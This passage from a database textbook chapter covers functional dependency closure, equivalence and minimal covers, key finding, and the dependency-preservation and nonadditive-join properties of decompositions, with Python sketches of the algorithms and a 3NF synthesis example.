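                if set(lhs) <= Xplus and not set(rhs) <= Xplus:
                    Xplus |= set(rhs)
                    changed = True
        return Xplus

    # The FDs specified on EMP_PROJ above
    F = [({'Ssn'}, {'Ename'}),
         ({'Pnumber'}, {'Pname', 'Plocation'}),
         ({'Ssn', 'Pnumber'}, {'Hours'})]

    print(closure({'Ssn'}, F))             # {'Ssn', 'Ename'}
    print(closure({'Pnumber'}, F))         # {'Pnumber', 'Pname', 'Plocation'}
    print(closure({'Ssn', 'Pnumber'}, F))  # all six attributes of EMP_PROJ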

1.2 Equivalence of Sets of Functional Dependencies
In this section we discuss the equivalence of two sets of functional dependencies.
First, we give some preliminary definitions.

Definition. A set of functional dependencies F is said to cover another set of
functional dependencies E if every FD in E is also in F+; that is, if every depen-
dency in E can be inferred from F; alternatively, we can say that E is covered by F.

Definition. Two sets of functional dependencies E and F are equivalent if
E+ = F+. Therefore, equivalence means that every FD in E can be inferred from
F, and every FD in F can be inferred from E; that is, E is equivalent to F if both
the conditions—E covers F and F covers E—hold.

We can determine whether F covers E by calculating X+ with respect to F for each FD
X → Y in E, and then checking whether this X+ includes the attributes in Y. If this is
the case for every FD in E, then F covers E. We determine whether E and F are equiv-
alent by checking that E covers F and F covers E. It is left to the reader as an exercise
to show that the following two sets of FDs are equivalent:

F = {A → C, AC → D, E → AD, E → H}
and G = {A → CD, E → AH}.
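This check translates directly into code. The sketch below is illustrative only (covers
and equivalent are hypothetical helper names); it repeats the closure function from the
previous sketch and confirms that the two sets F and G above are indeed equivalent.

    def closure(X, F):
        Xplus = set(X)
        changed = True
        while changed:
            changed = False
            for lhs, rhs in F:
                if lhs <= Xplus and not rhs <= Xplus:
                    Xplus |= rhs
                    changed = True
        return Xplus

    def covers(F, E):
        # F covers E if every FD X -> Y in E satisfies Y subset-of X+ (computed w.r.t. F).
        return all(rhs <= closure(lhs, F) for lhs, rhs in E)

    def equivalent(E, F):
        return covers(E, F) and covers(F, E)

    F = [({'A'}, {'C'}), ({'A', 'C'}, {'D'}), ({'E'}, {'A', 'D'}), ({'E'}, {'H'})]
    G = [({'A'}, {'C', 'D'}), ({'E'}, {'A', 'H'})]
    print(equivalent(F, G))   # True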

1.3 Minimal Sets of Functional Dependencies
Informally, a minimal cover of a set of functional dependencies E is a set of func-
tional dependencies F that satisfies the property that every dependency in E is in the
closure F+ of F. In addition, this property is lost if any dependency from the set F is
removed; F must have no redundancies in it, and the dependencies in F are in a
standard form. To satisfy these properties, we can formally define a set of functional
dependencies F to be minimal if it satisfies the following conditions:

1. Every dependency in F has a single attribute for its right-hand side.

2. We cannot replace any dependency X → A in F with a dependency Y → A,
where Y is a proper subset of X, and still have a set of dependencies that is
equivalent to F.

3. We cannot remove any dependency from F and still have a set of dependen-
cies that is equivalent to F.

We can think of a minimal set of dependencies as being a set of dependencies in a
standard or canonical form and with no redundancies. Condition 1 just represents


every dependency in a canonical form with a single attribute on the right-hand
side.4 Conditions 2 and 3 ensure that there are no redundancies in the dependencies
either by having redundant attributes on the left-hand side of a dependency
(Condition 2) or by having a dependency that can be inferred from the remaining
FDs in F (Condition 3).

Definition. A minimal cover of a set of functional dependencies E is a minimal
set of dependencies (in the standard canonical form and without redundancy)
that is equivalent to E. We can always find at least one minimal cover F for any
set of dependencies E using Algorithm 2.

If several sets of FDs qualify as minimal covers of E by the definition above, it is cus-
tomary to use additional criteria for minimality. For example, we can choose the
minimal set with the smallest number of dependencies or with the smallest total
length (the total length of a set of dependencies is calculated by concatenating the
dependencies and treating them as one long character string).

Algorithm 2. Finding a Minimal Cover F for a Set of Functional Dependencies E

Input: A set of functional dependencies E.

1. Set F := E.

2. Replace each functional dependency X → {A1, A2, …, An} in F by the n func-
tional dependencies X →A1, X →A2, …, X → An.

3. For each functional dependency X → A in F
for each attribute B that is an element of X

if { {F – {X → A} } ∪ { (X – {B} ) → A} } is equivalent to F
then replace X → A with (X – {B} ) → A in F.

4. For each remaining functional dependency X → A in F
if {F – {X → A} } is equivalent to F,

then remove X → A from F.

We illustrate the above algorithm with the following:

Let the given set of FDs be E : {B → A, D → A, AB → D}. We have to find the mini-
mal cover of E.

■ All the above dependencies are in canonical form (that is, they have only one
attribute on the right-hand side), so steps 1 and 2 of Algorithm 2 produce no
change and we can proceed to step 3. In step 3 we need to determine whether
AB → D has any redundant attribute on the left-hand side; that is, can it be
replaced by B → D or A → D?

4This is a standard form to simplify the conditions and algorithms that ensure no redundancy exists in F.
By using the inference rule IR4, we can convert a single dependency with multiple attributes on the right-
hand side into a set of dependencies with single attributes on the right-hand side.


■ Since B → A, by augmenting with B on both sides (IR2), we have BB → AB,
or B → AB (i). However, AB → D as given (ii).

■ Hence by the transitive rule (IR3), we get from (i) and (ii), B → D. Thus
AB → D may be replaced by B → D.

■ We now have a set equivalent to the original E, say E′: {B → A, D → A, B → D}.
No further reduction is possible in step 3 since all FDs have a single attribute
on the left-hand side.

■ In step 4 we look for a redundant FD in E′. By using the transitive rule on
B → D and D → A, we derive B → A. Hence B → A is redundant in E′ and
can be eliminated.

■ Therefore, the minimal cover of E is {B → D, D → A}.
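The bulleted derivation above can also be carried out mechanically. The following Python
sketch of Algorithm 2 is illustrative only; it reuses the closure-based equivalence test of
the earlier sketches and a hypothetical FD representation, and on E it reproduces the
minimal cover {B → D, D → A}.

    def closure(X, F):
        Xplus = set(X)
        changed = True
        while changed:
            changed = False
            for lhs, rhs in F:
                if lhs <= Xplus and not rhs <= Xplus:
                    Xplus |= rhs
                    changed = True
        return Xplus

    def equivalent(E, F):
        cov = lambda A, B: all(rhs <= closure(lhs, A) for lhs, rhs in B)
        return cov(E, F) and cov(F, E)

    def minimal_cover(E):
        # Steps 1-2: copy E and put every FD into canonical form (single RHS attribute).
        F = [(set(lhs), {a}) for lhs, rhs in E for a in rhs]
        # Step 3: remove redundant attributes from left-hand sides.
        for i, (lhs, rhs) in enumerate(F):
            for b in sorted(lhs):
                candidate = F[:i] + [(lhs - {b}, rhs)] + F[i + 1:]
                if equivalent(candidate, F):
                    lhs = lhs - {b}
                    F[i] = (lhs, rhs)
        # Step 4: remove redundant dependencies.
        for fd in list(F):
            rest = [g for g in F if g is not fd]
            if equivalent(rest, F):
                F = rest
        return F

    E = [({'B'}, {'A'}), ({'D'}, {'A'}), ({'A', 'B'}, {'D'})]
    print(minimal_cover(E))   # [({'D'}, {'A'}), ({'B'}, {'D'})], i.e., D -> A and B -> D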

In Section 3 we will see how relations can be synthesized from a given set of depend-
encies E by first finding the minimal cover F for E.

Next, we provide a simple algorithm to determine the key of a relation:

Algorithm 2(a). Finding a Key K for R Given a Set F of Functional Dependencies

Input: A relation R and a set of functional dependencies F on the attributes of
R.

1. Set K := R.

2. For each attribute A in K

{compute (K – A)+ with respect to F;

if (K – A)+ contains all the attributes in R, then set K := K – {A} };

In Algorithm 2(a), we start by setting K to all the attributes of R; we then remove one
attribute at a time and check whether the remaining attributes still form a superkey.
Notice, too, that Algorithm 2(a) determines only one key out of the possible candi-
date keys for R; the key returned depends on the order in which attributes are
removed from R in step 2.
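A direct Python rendering of Algorithm 2(a) is sketched below (illustrative only; it reuses
the closure function of the earlier sketches, and the attribute-removal order is fixed
alphabetically so that the run is reproducible). Applied to EMP_PROJ and the FDs given in
Section 1.1, it returns the key {Ssn, Pnumber}.

    def closure(X, F):
        Xplus = set(X)
        changed = True
        while changed:
            changed = False
            for lhs, rhs in F:
                if lhs <= Xplus and not rhs <= Xplus:
                    Xplus |= rhs
                    changed = True
        return Xplus

    def find_key(R, F):
        # Algorithm 2(a): drop an attribute whenever the rest still determines all of R.
        K = set(R)
        for A in sorted(R):
            if closure(K - {A}, F) >= set(R):
                K = K - {A}
        return K

    R = {'Ssn', 'Ename', 'Pnumber', 'Pname', 'Plocation', 'Hours'}
    F = [({'Ssn'}, {'Ename'}),
         ({'Pnumber'}, {'Pname', 'Plocation'}),
         ({'Ssn', 'Pnumber'}, {'Hours'})]
    print(find_key(R, F))   # {'Ssn', 'Pnumber'}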

2 Properties of Relational Decompositions
We now turn our attention to the process of decomposition to decompose relations
in order to get rid of unwanted dependencies and achieve higher normal forms. In
Section 2.1 we give examples to show that looking at an individual relation to test
whether it is in a higher normal form does not, on its own, guarantee a good design;
rather, a set of relations that together form the relational database schema must pos-
sess certain additional properties to ensure a good design. In Sections 2.2 and 2.3 we
discuss two of these properties: the dependency preservation property and the non-
additive (or lossless) join property. Section 2.4 discusses binary decompositions and
Section 2.5 discusses successive nonadditive join decompositions.


2.1 Relation Decomposition and Insufficiency
of Normal Forms

The relational database design algorithms that we present in Section 3 start from a
single universal relation schema R = {A1, A2, …, An} that includes all the attributes
of the database. We implicitly make the universal relation assumption, which states
that every attribute name is unique. The set F of functional dependencies that
should hold on the attributes of R is specified by the database designers and is made
available to the design algorithms. Using the functional dependencies, the algo-
rithms decompose the universal relation schema R into a set of relation schemas D
= {R1, R2, …, Rm} that will become the relational database schema; D is called a
decomposition of R.

We must make sure that each attribute in R will appear in at least one relation
schema Ri in the decomposition so that no attributes are lost; formally, we have

    R1 ∪ R2 ∪ … ∪ Rm = R

This is called the attribute preservation condition of a decomposition.

Another goal is to have each individual relation Ri in the decomposition D be in
BCNF or 3NF. However, this condition is not sufficient to guarantee a good data-
base design on its own. We must consider the decomposition of the universal rela-
tion as a whole, in addition to looking at the individual relations. To illustrate this
point, consider the EMP_LOCS(Ename, Plocation) relation in Figure 5 from the chap-
ter “Basics of Functional Dependencies and Normalization for Relational
Databases” which is in 3NF and also in BCNF. In fact, any relation schema with only
two attributes is automatically in BCNF.5 Although EMP_LOCS is in BCNF, it still
gives rise to spurious tuples when joined with EMP_PROJ (Ssn, Pnumber, Hours,
Pname, Plocation), which is not in BCNF (see the result of the natural join in Figure
6 from the same chapter). Hence, EMP_LOCS represents a particularly bad relation
schema because of its convoluted semantics by which Plocation gives the location of
one of the projects on which an employee works. Joining EMP_LOCS with
PROJECT(Pname, Pnumber, Plocation, Dnum) in Figure 2 from the chapter “Basics of
Functional Dependencies and Normalization for Relational Databases”—which is
in BCNF—using Plocation as a joining attribute also gives rise to spurious tuples.
This underscores the need for other criteria that, together with the conditions of
3NF or BCNF, prevent such bad designs. In the next three subsections we discuss
such additional conditions that should hold on a decomposition D as a whole.

2.2 Dependency Preservation Property
of a Decomposition

It would be useful if each functional dependency X→Y specified in F either
appeared directly in one of the relation schemas Ri in the decomposition D or could
be inferred from the dependencies that appear in some Ri. Informally, this is the
dependency preservation condition. We want to preserve the dependencies because


5As an exercise, the reader should prove that this statement is true.


each dependency in F represents a constraint on the database. If one of the depen-
dencies is not represented in some individual relation Ri of the decomposition, we
cannot enforce this constraint by dealing with an individual relation. We may have
to join multiple relations so as to include all attributes involved in that dependency.

It is not necessary that the exact dependencies specified in F appear themselves in
individual relations of the decomposition D. It is sufficient that the union of the
dependencies that hold on the individual relations in D be equivalent to F. We now
define these concepts more formally.

Definition. Given a set of dependencies F on R, the projection of F on Ri,
denoted by πRi(F) where Ri is a subset of R, is the set of dependencies X → Y in
F+ such that the attributes in X ∪ Y are all contained in Ri. Hence, the projec-
tion of F on each relation schema Ri in the decomposition D is the set of func-
tional dependencies in F+, the closure of F, such that all their left- and
right-hand-side attributes are in Ri. We say that a decomposition D = {R1,
R2, …, Rm} of R is dependency-preserving with respect to F if the union of the
projections of F on each Ri in D is equivalent to F; that is,
((πR1(F)) ∪ … ∪ (πRm(F)))+ = F+.

If a decomposition is not dependency-preserving, some dependency is lost in the
decomposition. To check that a lost dependency holds, we must take the JOIN of
two or more relations in the decomposition to get a relation that includes all left-
and right-hand-side attributes of the lost dependency, and then check that the
dependency holds on the result of the JOIN—an option that is not practical.

An example of a decomposition that does not preserve dependencies is shown in
Figure 13 (a) from the chapter “Basics of Functional Dependencies and
Normalization for Relational Databases,” in which the functional dependency FD2
is lost when LOTS1A is decomposed into {LOTS1AX, LOTS1AY}. From the same
chapter, the decompositions in Figure 12, however, are dependency-preserving. On the
other hand, for the example in Figure 14, no matter what decomposition is chosen for
the relation TEACH(Student, Course, Instructor) from the three provided in the text,
one or both of the dependencies originally present are bound to be lost. We state a
claim below related to this property without providing any proof.

Claim 1. It is always possible to find a dependency-preserving decomposition
D with respect to F such that each relation Ri in D is in 3NF.

In Section 3.1, we describe Algorithm 4, which creates a dependency-
preserving decomposition D = {R1, R2, …, Rm} of a universal relation R based on a
set of functional dependencies F, such that each Ri in D is in 3NF.
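As a small illustration of this test, the sketch below (Python, illustrative only; the
projection of F on Ri is computed by brute force over all attribute subsets of Ri, and the
helper names are hypothetical) checks dependency preservation for TEACH(Student, Course,
Instructor), assuming its two dependencies are {Student, Course} → Instructor and
Instructor → Course, against the BCNF decomposition into (Instructor, Course) and
(Instructor, Student); as noted above, the former dependency is lost.

    from itertools import chain, combinations

    def closure(X, F):
        Xplus = set(X)
        changed = True
        while changed:
            changed = False
            for lhs, rhs in F:
                if lhs <= Xplus and not rhs <= Xplus:
                    Xplus |= rhs
                    changed = True
        return Xplus

    def projection(F, Ri):
        # pi_Ri(F): for every nonempty subset X of Ri, keep X -> (X+ intersect Ri).
        subsets = chain.from_iterable(combinations(sorted(Ri), n)
                                      for n in range(1, len(Ri) + 1))
        return [(set(X), closure(set(X), F) & set(Ri)) for X in subsets]

    def dependency_preserving(D, F):
        union = [fd for Ri in D for fd in projection(F, Ri)]
        return all(rhs <= closure(lhs, union) for lhs, rhs in F)

    F = [({'Student', 'Course'}, {'Instructor'}), ({'Instructor'}, {'Course'})]
    D = [{'Instructor', 'Course'}, {'Instructor', 'Student'}]
    print(dependency_preserving(D, F))   # False: {Student, Course} -> Instructor is lost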

2.3 Nonadditive (Lossless) Join Property
of a Decomposition

Another property that a decomposition D should possess is the nonadditive join
property, which ensures that no spurious tuples are generated when a NATURAL
JOIN operation is applied to the relations resulting from the decomposition. We
already illustrated this problem in Section 1.4 from the chapter “Basics of


Functional Dependencies and Normalization for Relational Databases” with the
example from that chapter in Figures 5 and 6. Because this is a property of a decom-
position of relation schemas, the condition of no spurious tuples should hold on
every legal relation state—that is, every relation state that satisfies the functional
dependencies in F. Hence, the lossless join property is always defined with respect to
a specific set F of dependencies.

Definition. Formally, a decomposition D = {R1, R2, …, Rm} of R has the lossless
(nonadditive) join property with respect to the set of dependencies F on R if,
for every relation state r of R that satisfies F, the following holds, where * is the
NATURAL JOIN of all the relations in D: *(πR1(r), …, πRm(r)) = r.

The word loss in lossless refers to loss of information, not to loss of tuples. If a decom-
position does not have the lossless join property, we may get additional spurious
tuples after the PROJECT (π) and NATURAL JOIN (*) operations are applied; these
additional tuples represent erroneous or invalid information. We prefer the term
nonadditive join because it describes the situation more accurately. Although the
term lossless join has been popular in the literature, we will henceforth use the term
nonadditive join, which is self-explanatory and unambiguous. The nonadditive join
property ensures that no spurious tuples result after the application of PROJECT and
JOIN operations. We may, however, sometimes use the term lossy design to refer to a
design that represents a loss of information (see example at the end of Algorithm 4).

The decomposition of EMP_PROJ(Ssn, Pnumber, Hours, Ename, Pname, Plocation) in
Figure 3 from the chapter “Basics of Functional Dependencies and Normalization
for Relational Databases” into EMP_LOCS(Ename, Plocation) and EMP_PROJ1(Ssn,
Pnumber, Hours, Pname, Plocation) in Figure 5 (same chapter) obviously does not
have the nonadditive join property, as illustrated by Figure 6 (same chapter). We will
use a general procedure for testing whether any decomposition D of a relation into
n relations is nonadditive with respect to a set of given functional dependencies F in
the relation; it is presented as Algorithm 3 below. It is possible to apply a simpler test
to check if the decomposition is nonadditive for binary decompositions; that test is
described in Section 2.4.

Algorithm 3. Testing for Nonadditive Join Property

Input: A universal relation R, a decomposition D = {R1, R2, …, Rm} of R, and a
set F of functional dependencies.

Note: Explanatory comments are given at the end of some of the steps. They fol-
low the format: (* comment *).

1. Create an initial matrix S with one row i for each relation Ri in D, and one
column j for each attribute Aj in R.

2. Set S(i, j):= bij for all matrix entries. (* each bij is a distinct symbol associated
with indices (i, j) *).

3. For each row i representing relation schema Ri
{for each column j representing attribute Aj

{if (relation Ri includes attribute Aj) then set S(i, j):= aj;};}; (* each aj is a
distinct symbol associated with index ( j) *).


4. Repeat the following loop until a complete loop execution results in no
changes to S
{for each functional dependency X → Y in F

{for all rows in S that have the same symbols in the columns corresponding
to attributes in X

{make the symbols in each column that correspond to an attribute in Y
be the same in all these rows as follows: If any of the rows has an a sym-
bol for the column, set the other rows to that same a symbol in the col-
umn. If no a symbol exists for the attribute in any of the rows, choose
one of the b symbols that appears in one of the rows for the attribute
and set the other rows to that same b symbol in the column ;} ; } ;};

5. If a row is made up entirely of a symbols, then the decomposition has the
nonadditive join property; otherwise, it does not.

Given a relation R that is decomposed into a number of relations R1, R2, …, Rm,
Algorithm 3 begins by constructing a matrix S that we consider to be some relation state r of R.
Row i in S represents a tuple ti (corresponding to relation Ri) that has a symbols in
the columns that correspond to the attributes of Ri and b symbols in the remaining
columns. The algorithm then transforms the rows of this matrix (during the loop in
step 4) so that they represent tuples that satisfy all the functional dependencies in F.
At the end of step 4, any two rows in S—which represent two tuples in r—that agree
in their values for the left-hand-side attributes X of a functional dependency X → Y
in F will also agree in their values for the right-hand-side attributes Y. It can be
shown that after applying the loop of step 4, if any row in S ends up with all a sym-
bols, then the decomposition D has the nonadditive join property with respect to F.

If, on the other hand, no row ends up being all a symbols, D does not satisfy the
lossless join property. In this case, the relation state r represented by S at the end of
the algorithm will be an example of a relation state r of R that satisfies the depend-
encies in F but does not satisfy the nonadditive join condition. Thus, this relation
serves as a counterexample that proves that D does not have the nonadditive join
property with respect to F. Note that the a and b symbols have no special meaning
at the end of the algorithm.
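The following is a small Python sketch of Algorithm 3 (the function name is_nonadditive and the encoding of the a and b symbols as tuples are our own choices, not part of the text). It builds the matrix S of steps 1 through 3 and then repeats step 4 until no more changes occur:

# Sketch of Algorithm 3: test a decomposition for the nonadditive join property.
# Attribute names are strings; each FD in F is a pair (X, Y) of sets of attributes.

def is_nonadditive(R, D, F):
    R = list(R)
    col = {A: j for j, A in enumerate(R)}
    # Steps 1-3: initial matrix S. ('a', j) stands for a_j; ('b', i, j) for b_ij.
    S = [[('a', j) if A in Ri else ('b', i, j) for j, A in enumerate(R)]
         for i, Ri in enumerate(D)]
    changed = True
    while changed:                              # Step 4: repeat until no change
        changed = False
        for X, Y in F:
            xcols = [col[A] for A in X]
            ycols = [col[A] for A in Y]
            groups = {}
            for row in S:                       # rows that agree on the X columns
                key = tuple(row[j] for j in xcols)
                groups.setdefault(key, []).append(row)
            for rows in groups.values():
                if len(rows) < 2:
                    continue
                for j in ycols:
                    symbols = [row[j] for row in rows]
                    # Prefer an 'a' symbol; otherwise pick one of the b symbols.
                    chosen = next((s for s in symbols if s[0] == 'a'), symbols[0])
                    for row in rows:
                        if row[j] != chosen:
                            row[j] = chosen
                            changed = True
    # Step 5: nonadditive iff some row consists entirely of 'a' symbols.
    return any(all(s[0] == 'a' for s in row) for row in S)

R = {'Ssn', 'Ename', 'Pnumber', 'Pname', 'Plocation', 'Hours'}
F = [({'Ssn'}, {'Ename'}),
     ({'Pnumber'}, {'Pname', 'Plocation'}),
     ({'Ssn', 'Pnumber'}, {'Hours'})]
D_bad = [{'Ename', 'Plocation'},
         {'Ssn', 'Pnumber', 'Hours', 'Pname', 'Plocation'}]
D_good = [{'Ssn', 'Ename'},
          {'Pnumber', 'Pname', 'Plocation'},
          {'Ssn', 'Pnumber', 'Hours'}]
print(is_nonadditive(R, D_bad, F))   # False
print(is_nonadditive(R, D_good, F))  # True

Applied to the two decompositions of EMP_PROJ discussed next (Figure 1), the first call prints False and the second prints True, matching Cases 1 and 2 below.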

Figure 1(a) shows how we apply Algorithm 3 to the decomposition of the
EMP_PROJ relation schema from Figure 3(b) from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases” into the two relation
schemas EMP_PROJ1 and EMP_LOCS in Figure 5(a) of the same chapter. The loop
in step 4 of the algorithm cannot change any b symbols to a symbols; hence, the
resulting matrix S does not have a row with all a symbols, and so the decomposition
does not have the nonadditive join property.

Figure 1(b) shows another decomposition of EMP_PROJ (into EMP, PROJECT, and
WORKS_ON) that does have the nonadditive join property, and Figure 1(c) shows
how we apply the algorithm to that decomposition. Once a row consists only of a
symbols, we conclude that the decomposition has the nonadditive join property,
and we can stop applying the functional dependencies (step 4 in the algorithm) to
the matrix S.

[Figure 1: Nonadditive join test for n-ary decompositions. (a) Case 1: the decomposition of EMP_PROJ into EMP_PROJ1 and EMP_LOCS fails the test. Here R = {Ssn, Ename, Pnumber, Pname, Plocation, Hours}, D = {R1, R2} with R1 = EMP_LOCS = {Ename, Plocation} and R2 = EMP_PROJ1 = {Ssn, Pnumber, Hours, Pname, Plocation}, and F = {Ssn → Ename; Pnumber → {Pname, Plocation}; {Ssn, Pnumber} → Hours}; no changes to the matrix occur after applying the functional dependencies. (b) A decomposition of EMP_PROJ into EMP, PROJECT, and WORKS_ON that has the lossless (nonadditive) join property. (c) Case 2: the decomposition of EMP_PROJ into R1 = EMP = {Ssn, Ename}, R2 = PROJ = {Pnumber, Pname, Plocation}, and R3 = WORKS_ON = {Ssn, Pnumber, Hours} satisfies the test; after applying the first two functional dependencies, the last row of the matrix S is all “a” symbols, so we stop.]


2.4 Testing Binary Decompositions for the Nonadditive
Join Property

Algorithm 3 allows us to test whether a particular decomposition D into n relations
obeys the nonadditive join property with respect to a set of functional dependencies
F. There is a special case of a decomposition called a binary decomposition—
decomposition of a relation R into two relations. We give a test that is easier to apply
than Algorithm 3; while it is very handy to use, it is limited to binary decompositions
only.

Property NJB (Nonadditive Join Test for Binary Decompositions). A
decomposition D = {R1, R2} of R has the lossless (nonadditive) join property
with respect to a set of functional dependencies F on R if and only if either

■ The FD ((R1 ∩ R2) → (R1 – R2)) is in F+, or

■ The FD ((R1 ∩ R2) → (R2 – R1)) is in F+

You should verify that this property holds with respect to our informal successive
normalization examples in Sections 3 and 4 from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases.” In Section 5 of the
same chapter we decomposed LOTS1A into two BCNF relations LOTS1AX and
LOTS1AY, and decomposed the TEACH relation in Figure 14 of that chapter into the
two relations {Instructor, Course} and {Instructor, Student}. These are valid decompo-
sitions because they are nonadditive per the above test.
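Here is a minimal Python sketch of the NJB test (the helper names closure and njb are ours; closure implements the attribute-closure idea of Algorithm 1). It relies on the fact that an FD X → Y is in F+ exactly when Y ⊆ X+:

# Sketch of the NJB test for a binary decomposition D = {R1, R2}.
# Each FD is a pair (X, Y) of sets of attribute names.

def closure(X, F):
    """Attribute closure X+ under F."""
    result = set(X)
    changed = True
    while changed:
        changed = False
        for lhs, rhs in F:
            if lhs <= result and not rhs <= result:
                result |= rhs
                changed = True
    return result

def njb(R1, R2, F):
    """True if {R1, R2} is a nonadditive join decomposition with respect to F."""
    common = R1 & R2
    c = closure(common, F)
    return (R1 - R2) <= c or (R2 - R1) <= c

# TEACH(Instructor, Course, Student) with FD Instructor -> Course:
F = [({'Instructor'}, {'Course'})]
R1 = {'Instructor', 'Student'}
R2 = {'Instructor', 'Course'}
print(njb(R1, R2, F))   # True: the decomposition of TEACH is nonadditive

For the TEACH example, the common attribute Instructor functionally determines Course, so the binary decomposition passes the test, as stated above.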

2.5 Successive Nonadditive Join Decompositions
We saw the successive decomposition of relations during the process of second and
third normalization in Sections 3 and 4 from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases.” To verify that these
decompositions are nonadditive, we need to ensure another property, as set forth in
Claim 2.

Claim 2 (Preservation of Nonadditivity in Successive Decompositions). If a
decomposition D = {R1, R2, …, Rm} of R has the nonadditive (lossless) join
property with respect to a set of functional dependencies F on R, and if a
decomposition Di = {Q1, Q2, …, Qk} of Ri has the nonadditive join property
with respect to the projection of F on Ri, then the decomposition D2 = {R1, R2,
…, Ri−1, Q1, Q2, …, Qk, Ri+1, …, Rm} of R has the nonadditive join property with
respect to F.

3 Algorithms for Relational Database Schema
Design

We now give three algorithms for creating a relational decomposition from a uni-
versal relation. Each algorithm has specific properties, as we discuss next.


3.1 Dependency-Preserving Decomposition
into 3NF Schemas

Algorithm 4 creates a dependency-preserving decomposition D = {R1, R2, …, Rm} of
a universal relation R based on a set of functional dependencies F, such that each Ri
in D is in 3NF. It guarantees only the dependency-preserving property; it does not
guarantee the nonadditive join property. The first step of Algorithm 4 is to find a
minimal cover G for F; Algorithm 2 can be used for this step. Note that multiple
minimal covers may exist for a given set F (as we illustrate later in the example after
Algorithm 4). In such cases the algorithms can potentially yield multiple alternative
designs.

Algorithm 4. Relational Synthesis into 3NF with Dependency Preservation
Input: A universal relation R and a set of functional dependencies F on the
attributes of R.

1. Find a minimal cover G for F (use Algorithm 2);

2. For each left-hand-side X of a functional dependency that appears in G, cre-
ate a relation schema in D with attributes {X ∪ {A1} ∪ {A2} … ∪ {Ak} },
where X → A1, X → A2, …, X → Ak are the only dependencies in G with X as
the left-hand-side (X is the key of this relation);

3. Place any remaining attributes (that have not been placed in any relation) in
a single relation schema to ensure the attribute preservation property.

Example of Algorithm 4. Consider the following universal relation:

U(Emp_ssn, Pno, Esal, Ephone, Dno, Pname, Plocation)

Emp_ssn, Esal, Ephone refer to the Social Security number, salary, and phone number
of the employee. Pno, Pname, and Plocation refer to the number, name, and location
of the project. Dno is department number.

The following dependencies are present:

FD1: Emp_ssn → {Esal, Ephone, Dno}
FD2: Pno → { Pname, Plocation}
FD3: Emp_ssn, Pno → {Esal, Ephone, Dno, Pname, Plocation}

By virtue of FD3, the attribute set {Emp_ssn, Pno} represents a key of the universal
relation. Hence F, the set of given FDs includes {Emp_ssn → Esal, Ephone, Dno;
Pno → Pname, Plocation; Emp_ssn, Pno → Esal, Ephone, Dno, Pname, Plocation}.

By applying the minimal cover Algorithm 2, in step 3 we see that Pno is a redundant
attribute in Emp_ssn, Pno → Esal, Ephone, Dno. Moreover, Emp_ssn is redundant in
Emp_ssn, Pno → Pname, Plocation. Hence the minimal cover consists of FD1 and FD2
only (FD3 being completely redundant) as follows (if we group attributes with the
same left-hand side into one FD):

Minimal cover G: {Emp_ssn → Esal, Ephone, Dno; Pno → Pname, Plocation}
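A small Python check (the function name closure is ours) confirms these redundancies using attribute closures; each test prints True under the stated FDs:

# Confirming the redundancies noted above via attribute closures.

def closure(X, F):
    result = set(X)
    changed = True
    while changed:
        changed = False
        for lhs, rhs in F:
            if lhs <= result and not rhs <= result:
                result |= rhs
                changed = True
    return result

F = [({'Emp_ssn'}, {'Esal', 'Ephone', 'Dno'}),
     ({'Pno'}, {'Pname', 'Plocation'}),
     ({'Emp_ssn', 'Pno'}, {'Esal', 'Ephone', 'Dno', 'Pname', 'Plocation'})]

# Pno is extraneous in FD3's left-hand side for Esal, Ephone, Dno:
print({'Esal', 'Ephone', 'Dno'} <= closure({'Emp_ssn'}, F))          # True
# Emp_ssn is extraneous in FD3's left-hand side for Pname, Plocation:
print({'Pname', 'Plocation'} <= closure({'Pno'}, F))                 # True
# FD3 as a whole follows from FD1 and FD2 alone:
G = F[:2]
print({'Esal', 'Ephone', 'Dno', 'Pname', 'Plocation'}
      <= closure({'Emp_ssn', 'Pno'}, G))                             # True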


6See Maier (1983) or Ullman (1982) for a proof.

By applying Algorithm 4 to the above Minimal cover G, we get a 3NF design consist-
ing of two relations with keys Emp_ssn and Pno as follows:

R1 (Emp_ssn, Esal, Ephone, Dno)
R2 (Pno, Pname, Plocation)

An observant reader would notice easily that these two relations have lost the original
information contained in the key of the universal relation U (namely, that there are
certain employees working on certain projects in a many-to-many relationship).
Thus, while the algorithm does preserve the original dependencies, it makes no guar-
antee of preserving all of the information. Hence, the resulting design is a lossy design.
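A minimal Python sketch of Algorithm 4, assuming the minimal cover G has already been computed by Algorithm 2, simply groups the dependencies in G by their left-hand sides (the function name synthesize_3nf is ours):

# Sketch of Algorithm 4: synthesize 3NF relation schemas from a minimal cover G.
# Each FD in G is a pair (X, Y) of sets of attribute names.

def synthesize_3nf(R, G):
    schemas = []
    placed = set()
    # Step 2: one relation schema per distinct left-hand side X in G.
    lhs_groups = {}
    for X, Y in G:
        lhs_groups.setdefault(frozenset(X), set()).update(Y)
    for X, rhs in lhs_groups.items():
        schema = set(X) | rhs
        schemas.append(schema)
        placed |= schema
    # Step 3: put any unplaced attributes into one additional relation schema.
    leftover = set(R) - placed
    if leftover:
        schemas.append(leftover)
    return schemas

R = {'Emp_ssn', 'Pno', 'Esal', 'Ephone', 'Dno', 'Pname', 'Plocation'}
G = [({'Emp_ssn'}, {'Esal', 'Ephone', 'Dno'}),
     ({'Pno'}, {'Pname', 'Plocation'})]
for s in synthesize_3nf(R, G):
    print(sorted(s))
# ['Dno', 'Emp_ssn', 'Ephone', 'Esal'] and ['Plocation', 'Pname', 'Pno']

Running it on the minimal cover G above reproduces the two schemas R1 and R2, which is exactly the lossy 3NF design just discussed.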

Claim 3. Every relation schema created by Algorithm 4 is in 3NF. (We will not
provide a formal proof here;6 the proof depends on G being a minimal set of
dependencies.)

It is obvious that all the dependencies in G are preserved by the algorithm because
each dependency appears in one of the relations Ri in the decomposition D. Since G
is equivalent to F, all the dependencies in F are either preserved directly in the
decomposition or are derivable using the inference rules from Section 1.1 from
those in the resulting relations, thus ensuring the dependency preservation prop-
erty. Algorithm 4 is called a relational synthesis algorithm, because each relation
schema Ri in the decomposition is synthesized (constructed) from the set of func-
tional dependencies in G with the same left-hand-side X.

3.2 Nonadditive Join Decomposition into BCNF Schemas
The next algorithm decomposes a universal relation schema R = {A1, A2, …, An} into
a decomposition D = {R1, R2, …, Rm} such that each Ri is in BCNF and the decom-
position D has the lossless join property with respect to F. Algorithm 5 utilizes
Property NJB and Claim 2 (preservation of nonadditivity in successive decomposi-
tions) to create a nonadditive join decomposition D = {R1, R2, …, Rm} of a universal
relation R based on a set of functional dependencies F, such that each Ri in D is in
BCNF.

